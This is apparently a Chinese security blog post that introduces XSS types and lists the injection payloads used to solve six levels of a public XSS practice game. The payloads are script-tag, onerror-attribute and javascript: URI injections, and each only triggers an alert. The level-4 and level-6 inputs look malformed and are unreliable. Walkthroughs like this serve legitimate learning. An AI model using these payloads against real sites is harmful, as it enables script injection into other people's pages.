lhosts@home:~$

Archive

About

RSS

web安全-xss漏洞1

当我们获取到表单,数据输入输出流页面的时候,我们可以对xss漏洞进行探测,xss严格来说,分为四种xss,一种是反射型xss,一种是存储型xss,还有一种是dom类型xss,最后一种是self类型,自主弹框型xss.

我们使用以下靶场来进行xss的漏洞利用。

https://xss-game.appspot.com/

第一关直接输入<script>alert(1)</script>,显示输出

image-20260311172834924

第二关输入<img src=# onerror=alert(1)>, <script> 标签没有效果,显示输出.

image-20260311172853043

第三关输入' onerror='alert(1); //,显示输出

image-20260311172902843

第四关输入3 '**alert());//,展现输出.

image-20260311172912722

第五关输入javascript:alert(1);,展现输出.

image-20260311172921936

第六关输入data:javascript,alert('XSS'),展现为.

image-20260311172930649